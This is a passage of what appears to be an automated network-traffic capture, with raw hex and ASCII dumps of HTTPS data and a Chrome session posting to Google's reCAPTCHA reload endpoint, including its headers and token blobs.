                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: 57 44 29 3b d9 39 60 c3 90 54 d5 ef 0d 78 87 57 b3 b4 ba f1 6d 85 f0 86 e6 ca e0 13 07 76 43 d7 8f 4a 89 37 a5 8b e5 8c f4 67 81 f8 83 4c ba d1 b5 6b ad 3a f6 26 8e 7b 79 19 19 58 60 82 0d 67 b2 d7 75 f1 86 79 35 4f 12 36 bc e3 3f 6e 1b d9 87 42 dd 4d 70 e4 d0 9b ea 4a d3 46 45 d0 d0 48 ed 4f 65 f6 a8 fe 6d e0 6d e2 9b 65 2d 04 3c 53 80 c9 e9 9a 92 40 8b c9 fc aa 25 63 93 b4 66 96 81 61 ac 38 e9 51 34 60 f5 a9 9f a7 4c 54 61 b9 c1 a5 d0 4b 72 16 88 af 4c d3 16 42 8f 86 07 1e b5 6c ed 3f c5 9a 6b a2 ba e0 d0 ae 86 d1 18 70 7a 1a 78 3d cd 42 d1 ec 39 43 9a 45 79 17 96 18 1e b5 6a 42 48 b0 c2 9a 47 14 c1 2a 91 c1 cd 28 7c d5 a6 ac 43 5a 88 7a d3 ed b8 98 62 98 48 a7 45 c4 80 e7 15 00 8d 54 e0 52 8a 62 31 c0 a7 0a 61 72 45 39 38 35 20 e9 51 46 3e 6d c7 a5 4a
                                                                                                                                                                                                                                                                  Data Ascii: WD);9`TxWmvCJ7gLk:&{yX`guy5O6?nBMpJFEHOemme-<S@%cfa8Q4`LTaKrLBl?kpzx=B9CEyjBHG*(|CZzbHETRb1arE985 QF>mJ
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: f0 84 ba dd e4 92 41 20 2a ef c5 65 52 2a 46 b4 af b9 c3 08 f2 40 18 39 a9 e0 b3 95 cf c9 19 3f 4a ef af bc 35 a7 e8 b7 66 d6 e1 25 9a 65 e4 85 5a d8 f0 f5 b4 51 dc 46 f0 e8 86 65 07 3f 30 eb 59 38 c5 6e 6a a4 de c7 29 e1 8f 02 eb 5a dc ca 96 96 52 92 7f d9 af 46 f0 97 c3 6d 27 47 d4 87 fc 25 da 84 36 aa a3 3e 5e 72 e7 da ba a9 6f 7c 72 d0 05 d1 74 86 b2 84 ae 07 97 0e 0f e7 55 7c 3f f0 a3 c5 de 23 d4 be d3 ab f9 d1 a9 6d cc f2 66 a3 9a fa 45 05 af b9 57 c5 9e 3b f0 fe 91 1f f6 77 85 74 88 94 a7 02 e2 41 b9 8f bd 79 ae a9 ad eb 7a e5 c1 fb 44 b3 3b 31 c0 19 38 fc ab e9 e1 f0 7f c1 1a 5c 48 ba ad f2 a4 87 bb 90 32 6a 9c da 57 c2 7d 0a f0 33 de c5 23 45 c8 51 cd 25 65 bb 0e 57 7f 75 1f 3e 78 7b c0 3a fe b3 28 09 69 29 56 e3 24 1c 7e 75 de 59 7c 3f d0 bc 29
                                                                                                                                                                                                                                                                  Data Ascii: A *eR*F@9?J5f%eZQFe?0Y8nj)ZRFm'G%6>^ro|rtU|?#mfEW;wtAyzD;18\H2jW}3#EQ%eWu>x{:(i)V$~uY|?)
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: f1 37 ed 13 33 79 96 ba 5d 82 46 4e 70 fd 6b c5 6e f4 5d 78 b6 f9 2d ee 08 7e 87 06 bb 0f 02 fc 23 d7 35 9b e8 da 7b 56 86 0e 19 a4 71 81 8a 1d 37 7d c7 cd 1e 87 1b e2 cf 18 78 9b c4 37 ad 3d d4 d7 0d ce 46 09 c5 5c f0 9f 81 fc 49 e2 a9 42 43 1c e7 8c 96 39 c6 3e b5 f5 0d bf c3 2f 06 e9 da 44 7f 6c b6 8d bc a1 f3 c8 e7 19 35 93 e2 ef 88 1e 12 f0 56 8c f1 e9 6d 6c d3 20 c2 a4 58 fc 33 49 72 c7 72 79 a4 de 87 9a e9 3f 00 75 60 e9 25 f4 ca aa 7e f2 b1 e8 2b 63 59 9f c1 9f 0c b4 e3 0c 31 c5 79 a8 8f bf d0 e0 d7 01 aa 7c 77 f1 34 f3 ca 6d e7 08 8c 30 31 d8 57 95 eb 9a cd e6 af 73 2d d5 d4 85 de 56 24 9c f7 ab 57 7b 2b 03 8a 5b b3 6f e2 0f 8e 35 3f 13 dd b4 cf 21 48 07 dc 41 c0 15 c6 c7 23 06 1c b7 3d 71 4f 80 7c a5 5b 9a 96 28 06 f0 49 c0 ad 61 4f 94 99 34 b6
                                                                                                                                                                                                                                                                  Data Ascii: 73y]FNpkn]x-~#5{Vq7}x7=F\IBC9>/Dl5Vml X3Irry?u`%~+cY1y|w4m01Ws-V$W{+[o5?!HA#=qO|[(IaO4
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: 67 18 40 7d c9 ab f6 3a 45 c5 cb 81 14 4f 23 11 c0 03 34 e2 9b 0e 64 66 c4 85 b3 81 f5 a7 e1 17 81 d6 a7 d4 21 b9 b5 91 a1 92 36 42 bd 41 ed 58 29 a9 ba 5f 6c da 0a 83 f3 67 d2 9e 91 26 2d 48 e8 6c 2c 6e af 1c 08 91 98 93 8c 0a ef f4 0f 02 5c 2d b8 bb be fd d2 63 27 35 d5 78 2f 52 f0 66 95 e0 f8 75 27 44 7b d6 5c ec 3c 9c d7 21 e2 ff 00 1d 5d 6a b2 b2 c2 7c 98 3f 85 57 8e 2a 5c d7 40 54 db 65 5d 72 2b 18 66 f2 2d 70 db 7a 9a 4b 18 fe 75 c1 03 f0 e6 b9 b1 a8 83 2e 49 cf 35 b3 a6 df 46 64 04 1a c5 ea 74 45 25 b1 db 69 d1 0f 2c 1a a5 af 9d a8 54 93 d2 a5 d3 2f 11 a3 18 23 35 5f 5d 60 f1 9c 9a 94 85 26 70 9a a3 93 21 e6 a8 70 33 fe 35 7f 51 4f de 1c 8e f5 48 a7 70 2b 44 20 ce 45 21 18 1d 29 ea 3e 5a 31 c5 57 40 6c 61 e9 4c 51 d6 9e c1 47 24 e2 9e 10 f1 c5 24
                                                                                                                                                                                                                                                                  Data Ascii: g@}:EO#4df!6BAX)_lg&-Hl,n\-c'5x/Rfu'D{\<!]j|?W*\@Te]r+f-pzKu.I5FdtE%i,T/#5_]`&p!p35QOHp+D E!)>Z1W@laLQG$$
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: 10 45 3c 45 28 1f 76 a1 b2 85 38 a5 c8 c6 29 a4 3e 32 56 90 1e 7b d1 71 e8 29 f6 a5 19 a3 8f 6a 76 7e 9f 85 26 c7 64 0a 3a d0 29 54 d1 c7 a5 3b dc 15 80 03 47 34 e2 69 a5 80 e4 d1 71 58 50 29 78 da 4e 40 35 13 48 5b 85 c5 34 a8 62 37 1f 9b b5 35 16 26 d2 09 18 e6 a1 68 cc 8d 97 24 8e d8 ab 71 db bb 9c 9a bd 67 a7 e4 e7 04 d6 8a 36 dc c9 4e ef 43 3e 38 a4 91 40 0a 46 2a dd ad a0 e0 be 49 f4 ad 9b 7d 2e f2 69 96 28 ed e4 0c dd 3e 5a f5 1f 03 fc 31 17 8c 97 1a 9b 14 8c 0c 91 50 ab 53 e6 e5 46 9c 8f 73 ce 3c 37 e1 db fd 5e e5 20 b4 b3 77 24 e3 38 af 55 f0 f7 80 b4 ef 0f 34 57 1a e6 27 94 b0 fd d2 8e 17 eb 5e 8d a7 ae 8f a0 da 7d 9b 4a 86 22 ea 31 bf 1d fe b5 cf ea d7 8d 3c f0 16 6f bc 77 38 07 ad 71 62 f1 dc af 96 92 bb 34 85 0b eb 23 a1 b9 d4 d2 08 23 b5 d2
                                                                                                                                                                                                                                                                  Data Ascii: E<E(v8)>2V{q)jv~&d:)T;G4iqXP)xN@5H[4b75&h$qg6NC>8@F*I}.i(>Z1PSFs<7^ w$8U4W'^}J"1<ow8qb4##
                                                                                                                                                                                                                                                                  2024-10-29 19:10:55 UTC1378INData Raw: 4e 36 5b 98 54 9d d9 6b 5f f1 06 a9 e2 3b d2 f3 4a ca 87 81 9e 00 15 76 cf 49 d1 92 15 fb 53 b3 ca 7b 8e 95 58 da a7 93 85 00 7a 62 9b 6e db e5 c1 3c 2f 51 ea 6b 68 c9 c7 54 43 b3 d0 b7 79 a4 78 6c 47 94 33 2b fe 95 9a 3c 39 65 70 47 d9 ae c2 b1 3c 06 15 35 d3 19 5f 62 f0 2a 7b 68 5e 25 0d 9e 69 f3 b7 b9 36 46 2e a7 e1 ad 42 cd 4c 88 04 88 3b af 35 8c f0 bc 5c 3a 32 9f 71 8a ef 64 be b8 0a 91 0c 90 4e 05 69 4f 67 a7 ea 96 7e 4d dc 21 24 c6 37 81 8a 4e 48 6e 27 97 05 cf bd 31 e3 1b 87 15 d3 eb de 14 be d3 54 cb 12 f9 d0 9e 41 5e c2 b9 f6 4c 7c a7 39 a8 d4 9b 10 a8 28 41 35 a3 69 3f 4e 33 54 c8 1f 90 a2 36 d9 c8 19 34 d0 d1 bd 00 dd 83 5a ba 7b 84 60 70 05 60 69 b3 87 21 49 e6 b6 a0 07 b0 c7 a5 17 19 d4 e9 f7 60 60 6e c7 15 a4 b7 58 00 e7 3e d5 c8 c5 3b 28
                                                                                                                                                                                                                                                                  Data Ascii: N6[Tk_;JvIS{Xzbn</QkhTCyxlG3+<9epG<5_b*{h^%i6F.BL;5\:2qdNiOg~M!$7NHn'1TA^L|9(A5i?N3T64Z{`p`i!I``nX>;(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  92192.168.2.1649823142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC970OUTPOST /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 8026
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-protobuffer
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC8026OUTData Raw: 0a 18 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 12 ce 26 30 33 41 46 63 57 65 41 37 73 63 6c 58 70 64 54 6d 4f 4c 4f 35 76 77 5a 72 34 38 67 51 68 43 4b 61 59 4f 6a 46 4c 43 57 66 55 69 58 38 30 66 67 43 39 79 4c 58 59 61 4c 52 6c 68 4a 4d 4a 72 38 50 50 45 78 77 4d 4f 50 75 59 45 57 65 4c 56 6e 61 52 6e 51 6f 53 30 4a 46 4a 42 66 5a 62 36 54 4c 65 63 69 71 68 6a 74 52 44 79 45 79 70 42 32 34 6c 6e 6a 67 6c 74 6b 6b 48 43 69 41 36 7a 54 68 56 76 57 4c 56 78 41 67 57 78 39 5f 56 42 6a 64 34 39 6e 45 6b 65 64 65 51 71 57 31 4a 52 39 32 44 79 71 35 39 37 6e 47 38 31 72 41 48 65 49 58 38 76 74 45 6b 36 77 6f 72 36 6a 6d 6c 7a 46 73 49 44 6e 4f 47 6c 68 72 5a 59 53 35 76 66 55 65 63 45 5a 64 57 78 48 74 69 50 4b 31 79 6a 44 74 37
                                                                                                                                                                                                                                                                  Data Ascii: -ZG7BC9TxCVEbzIO2m429usb&03AFcWeA7sclXpdTmOLO5vwZr48gQhCKaYOjFLCWfUiX80fgC9yLXYaLRlhJMJr8PPExwMOPuYEWeLVnaRnQoS0JFJBfZb6TLeciqhjtRDyEypB24lnjgltkkHCiA6zThVvWLVxAgWx9_VBjd49nEkedeQqW1JR92Dyq597nG81rAHeIX8vtEk6wor6jmlzFsIDnOGlhrZYS5vfUecEZdWxHtiPK1yjDt7
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:57 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC637INData Raw: 34 30 35 36 0d 0a 29 5d 7d 27 0a 5b 22 72 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 64 67 43 7a 56 43 58 75 50 37 6b 66 74 32 7a 49 67 65 6a 5f 38 77 51 53 4e 31 75 7a 59 33 53 46 75 4f 72 39 79 62 58 63 32 62 50 42 73 63 6f 6a 7a 6f 6d 54 72 35 36 63 76 6e 52 71 66 42 53 77 31 46 4e 73 4a 7a 36 66 2d 52 58 68 39 47 51 62 55 35 5f 54 72 50 6a 46 34 51 47 70 35 42 34 73 6e 79 4a 4e 61 66 6d 57 4c 61 42 5a 67 79 47 73 7a 6a 45 65 49 62 63 7a 53 49 69 78 73 63 50 6b 37 50 6a 6e 6d 4f 61 50 77 4a 79 51 5f 4d 30 63 54 43 39 38 38 63 4e 5a 45 30 71 4a 44 4b 54 56 61 4c 78 5f 74 6a 63 59 78 59 78 6e 6b 32 72 65 49 38 74 4d 69 69 58 71 35 6e 39 38 38 65 76 75 7a 4c 74 64 44 50 74 36 2d 4d 41 41 41 77 6d 6a 63 56 64 37 47 75 35 58 74 55 57 69 57 74 37 57 45
                                                                                                                                                                                                                                                                  Data Ascii: 4056)]}'["rresp","03AFcWeA5dgCzVCXuP7kft2zIgej_8wQSN1uzY3SFuOr9ybXc2bPBscojzomTr56cvnRqfBSw1FNsJz6f-RXh9GQbU5_TrPjF4QGp5B4snyJNafmWLaBZgyGszjEeIbczSIixscPk7PjnmOaPwJyQ_M0cTC988cNZE0qJDKTVaLx_tjcYxYxnk2reI8tMiiXq5n988evuzLtdDPt6-MAAAwmjcVd7Gu5XtUWiWt7WE
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 65 51 38 41 68 68 6b 5a 31 7a 71 49 7a 47 59 39 5f 78 51 34 4f 51 6c 6f 39 57 4a 79 78 4a 54 7a 6e 4f 46 39 46 34 5a 69 33 42 49 4a 38 34 41 77 32 59 64 70 45 43 6f 53 55 39 6f 74 48 36 75 65 78 65 6c 64 50 4e 72 77 52 4f 5a 76 41 58 50 54 6c 51 41 54 65 53 44 58 52 77 61 69 79 45 44 32 48 33 67 76 52 43 74 41 70 38 53 45 65 76 58 59 44 5f 62 68 39 31 59 4b 6c 66 77 6b 73 39 48 61 58 7a 47 37 77 4e 56 37 37 52 69 48 2d 6e 71 43 65 53 42 44 62 54 51 6a 50 50 59 33 45 45 69 69 78 38 39 4c 69 79 79 41 49 4c 32 34 39 68 54 42 70 6a 78 4f 62 71 39 77 62 70 72 7a 38 6c 49 5a 36 6c 77 7a 46 36 63 51 37 4c 74 31 5f 4e 30 52 54 6e 54 64 69 45 50 4d 73 45 37 63 67 51 43 61 4c 52 73 77 77 6f 30 48 75 62 77 30 6c 58 37 53 5a 7a 38 43 58 63 32 31 36 77 5f 68 68 34 45
                                                                                                                                                                                                                                                                  Data Ascii: eQ8AhhkZ1zqIzGY9_xQ4OQlo9WJyxJTznOF9F4Zi3BIJ84Aw2YdpECoSU9otH6uexeldPNrwROZvAXPTlQATeSDXRwaiyED2H3gvRCtAp8SEevXYD_bh91YKlfwks9HaXzG7wNV77RiH-nqCeSBDbTQjPPY3EEiix89LiyyAIL249hTBpjxObq9wbprz8lIZ6lwzF6cQ7Lt1_N0RTnTdiEPMsE7cgQCaLRswwo0Hubw0lX7SZz8CXc216w_hh4E
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 42 58 4f 4e 32 69 35 34 5a 58 6c 5a 38 59 34 76 33 30 6d 4c 63 6a 53 72 34 6f 37 32 44 77 64 47 39 2d 63 6f 4f 30 4c 65 33 5a 74 35 31 79 52 47 37 4b 32 61 70 71 31 39 58 38 71 59 41 44 30 35 53 47 34 73 33 5a 42 69 4f 56 44 76 6b 58 58 41 79 74 6a 41 62 58 75 33 66 5a 51 39 34 47 67 4a 4b 4a 48 33 48 35 51 6b 5f 46 46 71 4f 52 52 59 63 58 5a 4b 42 57 57 42 6c 76 70 4d 7a 56 5a 41 5f 48 31 41 72 7a 56 5f 6c 52 5a 47 30 4c 4b 4b 6a 44 35 6a 68 37 68 4c 69 49 73 6a 76 50 4b 34 64 72 2d 68 34 5a 65 6b 51 55 74 6b 77 65 72 4b 6e 51 49 73 7a 48 68 4b 57 4d 32 76 79 38 4b 45 49 69 7a 30 4e 36 38 5a 37 71 65 67 61 34 4e 52 71 2d 59 4a 6a 68 50 4d 65 67 6f 6b 39 34 37 39 44 58 53 62 68 62 76 57 59 30 6f 79 30 54 30 31 72 36 31 6b 64 53 46 47 68 58 72 68 57 4e 43
                                                                                                                                                                                                                                                                  Data Ascii: BXON2i54ZXlZ8Y4v30mLcjSr4o72DwdG9-coO0Le3Zt51yRG7K2apq19X8qYAD05SG4s3ZBiOVDvkXXAytjAbXu3fZQ94GgJKJH3H5Qk_FFqORRYcXZKBWWBlvpMzVZA_H1ArzV_lRZG0LKKjD5jh7hLiIsjvPK4dr-h4ZekQUtkwerKnQIszHhKWM2vy8KEIiz0N68Z7qega4NRq-YJjhPMegok9479DXSbhbvWY0oy0T01r61kdSFGhXrhWNC
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 4f 54 58 62 55 54 39 50 35 35 76 78 4f 31 41 5a 58 71 34 62 35 72 77 34 79 6d 32 69 58 58 72 65 2d 4a 5a 6b 74 30 48 46 38 4f 2d 30 72 79 48 49 50 61 38 48 38 77 63 5a 6a 51 73 38 57 4f 6d 70 64 77 45 41 70 41 52 6f 6a 39 78 57 4c 49 58 44 35 37 74 54 35 38 32 55 69 71 46 43 56 36 4e 49 68 75 34 33 5a 4a 52 66 34 62 74 6e 56 48 38 55 71 67 46 4e 77 79 50 75 67 52 66 51 46 54 54 5a 6c 64 36 67 62 76 33 54 31 55 52 63 34 68 68 4f 71 52 45 53 66 4a 5a 45 37 56 6f 35 4a 7a 74 6e 33 52 43 65 4a 5f 66 73 48 41 45 58 45 5f 6f 65 4b 7a 34 37 62 56 6a 32 4b 5a 65 78 5a 53 72 76 2d 55 74 32 6f 6a 39 44 57 7a 62 37 78 68 6a 51 38 55 79 6d 50 48 64 42 32 41 48 55 46 6b 58 51 48 39 55 53 4c 65 74 62 78 66 39 4b 75 77 65 77 47 63 6f 35 75 4e 51 57 75 54 4c 34 50 41 34
                                                                                                                                                                                                                                                                  Data Ascii: OTXbUT9P55vxO1AZXq4b5rw4ym2iXXre-JZkt0HF8O-0ryHIPa8H8wcZjQs8WOmpdwEApARoj9xWLIXD57tT582UiqFCV6NIhu43ZJRf4btnVH8UqgFNwyPugRfQFTTZld6gbv3T1URc4hhOqRESfJZE7Vo5Jztn3RCeJ_fsHAEXE_oeKz47bVj2KZexZSrv-Ut2oj9DWzb7xhjQ8UymPHdB2AHUFkXQH9USLetbxf9KuwewGco5uNQWuTL4PA4
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 4c 48 79 4c 48 4f 50 41 63 32 6c 61 37 57 5a 36 71 2d 61 37 6d 52 75 64 30 7a 4f 54 66 4d 79 64 33 4b 46 5a 51 43 68 38 38 79 5a 4d 69 75 6c 39 46 2d 62 35 52 6d 33 42 7a 69 5a 6d 4d 76 62 42 51 71 61 31 69 32 59 72 53 4b 33 4d 67 32 6c 50 67 70 4f 56 41 61 66 34 54 76 47 36 6f 61 78 78 2d 73 61 54 4e 56 46 5f 6a 37 41 54 39 38 59 61 63 79 6c 38 76 4c 4a 74 4a 48 30 30 34 4e 62 64 59 31 61 56 64 51 4e 76 49 76 6f 5a 53 4b 45 49 33 43 71 39 44 30 77 6b 39 30 6e 53 6b 38 6c 56 65 77 45 73 4d 51 69 44 41 36 53 4c 71 51 41 36 58 5f 39 38 6f 6d 6d 74 7a 55 59 64 62 51 64 7a 5f 6b 69 4a 39 50 64 4d 72 33 56 31 63 6d 69 53 4f 30 5a 77 7a 54 6a 47 61 44 4f 31 58 6b 68 63 76 6b 51 34 74 39 46 64 32 62 35 59 67 73 37 72 45 71 68 6d 67 31 4c 46 64 71 50 42 61 58 2d
                                                                                                                                                                                                                                                                  Data Ascii: LHyLHOPAc2la7WZ6q-a7mRud0zOTfMyd3KFZQCh88yZMiul9F-b5Rm3BziZmMvbBQqa1i2YrSK3Mg2lPgpOVAaf4TvG6oaxx-saTNVF_j7AT98Yacyl8vLJtJH004NbdY1aVdQNvIvoZSKEI3Cq9D0wk90nSk8lVewEsMQiDA6SLqQA6X_98ommtzUYdbQdz_kiJ9PdMr3V1cmiSO0ZwzTjGaDO1XkhcvkQ4t9Fd2b5Ygs7rEqhmg1LFdqPBaX-
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 52 48 68 55 56 7a 42 58 61 6a 52 75 57 57 45 77 56 46 6c 4d 4e 55 78 78 5a 33 64 6d 65 55 4a 6d 56 55 70 50 4e 47 74 51 4e 47 52 48 61 31 68 59 65 44 4e 75 64 6c 4e 61 55 7a 64 68 64 6e 52 4a 63 6e 52 42 63 54 64 74 62 58 41 32 52 56 64 6b 57 56 5a 4a 55 30 78 44 4d 45 46 30 64 32 35 71 65 6d 6c 36 54 56 42 46 61 54 56 52 56 48 70 34 4d 45 49 76 4d 31 41 79 61 46 49 72 61 30 31 42 4d 6b 45 78 53 6c 46 6e 4e 7a 5a 4b 54 33 4a 49 4f 58 5a 43 53 58 6f 35 4c 32 30 30 4e 56 4a 6e 5a 58 42 6e 63 30 74 73 56 48 4e 77 64 45 4a 33 52 55 64 59 54 46 5a 77 51 79 74 6d 62 45 46 4b 56 30 30 30 5a 7a 56 32 4e 6e 56 4d 62 32 78 79 56 32 45 72 52 33 55 79 52 6b 70 53 55 58 56 77 4d 32 56 45 55 45 56 47 63 33 4e 71 4d 54 68 75 4b 30 35 68 62 30 4a 4b 56 47 73 78 56 6a 68
                                                                                                                                                                                                                                                                  Data Ascii: RHhUVzBXajRuWWEwVFlMNUxxZ3dmeUJmVUpPNGtQNGRHa1hYeDNudlNaUzdhdnRJcnRBcTdtbXA2RVdkWVZJU0xDMEF0d25qeml6TVBFaTVRVHp4MEIvM1AyaFIra01BMkExSlFnNzZKT3JIOXZCSXo5L200NVJnZXBnc0tsVHNwdEJ3RUdYTFZwQytmbEFKV000ZzV2NnVMb2xyV2ErR3UyRkpSUXVwM2VEUEVGc3NqMThuK05hb0JKVGsxVjh
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 41 72 56 6c 6f 32 5a 32 78 31 59 6b 5a 49 56 48 51 77 65 6a 5a 70 52 32 39 48 64 69 74 6c 57 48 63 79 61 32 35 6f 64 30 6c 79 55 6d 31 6d 5a 55 49 72 5a 46 4e 6a 4b 7a 68 51 59 55 67 77 57 69 74 58 5a 33 70 4c 52 6d 31 43 53 57 4e 44 64 33 52 4a 53 47 64 6b 62 6c 4a 4e 56 55 56 34 4b 32 4a 45 56 30 56 6b 56 30 64 56 4b 30 4d 30 54 30 4a 6a 4b 30 5a 44 64 44 4d 79 4d 45 6b 33 59 69 74 31 53 46 6f 32 4d 45 31 6c 61 32 68 7a 54 6b 6c 6d 63 57 56 48 63 54 64 4f 53 58 42 52 61 55 4e 32 54 47 31 4b 52 33 67 35 4f 48 42 71 4d 6e 45 30 61 47 73 34 57 46 4a 45 65 58 56 4b 63 6a 52 76 53 45 70 42 65 55 74 49 56 6c 52 79 5a 33 70 35 57 57 4a 43 59 7a 4a 71 4f 48 68 6d 5a 6d 78 6a 65 47 74 35 57 44 56 71 56 54 49 32 4f 55 70 59 4c 31 6c 77 4d 31 42 48 51 30 38 79 53
                                                                                                                                                                                                                                                                  Data Ascii: ArVlo2Z2x1YkZIVHQwejZpR29HditlWHcya25od0lyUm1mZUIrZFNjKzhQYUgwWitXZ3pLRm1CSWNDd3RJSGdkblJNVUV4K2JEV0VkV0dVK0M0T0JjK0ZDdDMyMEk3Yit1SFo2ME1la2hzTklmcWVHcTdOSXBRaUN2TG1KR3g5OHBqMnE0aGs4WFJEeXVKcjRvSEpBeUtIVlRyZ3p5WWJCYzJqOHhmZmxjeGt5WDVqVTI2OUpYL1lwM1BHQ08yS
                                                                                                                                                                                                                                                                  2024-10-29 19:10:57 UTC1378INData Raw: 65 57 4e 4c 4c 79 39 7a 5a 6c 42 48 57 6b 4e 75 61 58 46 61 5a 48 56 48 5a 7a 4e 46 59 30 56 4b 4e 31 56 54 4d 30 52 6c 4f 56 6c 70 62 55 70 74 62 47 4a 4d 4f 47 55 79 4e 6d 74 6f 61 46 4a 52 63 55 68 31 4f 47 39 6e 51 6d 74 31 63 6b 35 4c 57 45 4e 42 5a 56 52 61 54 30 46 31 56 6e 52 46 4e 48 46 71 4f 57 35 58 55 7a 56 4f 62 55 52 34 52 54 52 6c 63 44 6c 43 4e 56 68 75 53 6d 77 76 61 46 64 54 4e 55 4a 78 62 56 68 6b 53 31 64 75 4e 6b 5a 73 63 6c 42 61 55 6a 52 46 61 30 68 56 51 6e 4e 33 4e 79 73 34 57 6e 70 44 64 48 4e 33 52 6c 51 79 4e 33 68 4f 4f 56 45 34 64 6d 5a 44 59 6c 46 31 4e 56 46 4c 57 54 56 43 61 6d 63 31 57 57 4a 50 4c 30 31 53 51 57 49 7a 4e 7a 46 4e 61 30 31 4b 56 6d 56 35 4c 32 4e 30 55 6c 55 76 4e 45 31 4a 55 46 64 34 62 7a 6c 5a 59 31 46
                                                                                                                                                                                                                                                                  Data Ascii: eWNLLy9zZlBHWkNuaXFaZHVHZzNFY0VKN1VTM0RlOVlpbUptbGJMOGUyNmtoaFJRcUh1OG9nQmt1ck5LWENBZVRaT0F1VnRFNHFqOW5XUzVObUR4RTRlcDlCNVhuSmwvaFdTNUJxbVhkS1duNkZsclBaUjRFa0hVQnN3Nys4WnpDdHN3RlQyN3hOOVE4dmZDYlF1NVFLWTVCamc1WWJPL01SQWIzNzFNa01KVmV5L2N0UlUvNE1JUFd4bzlZY1F
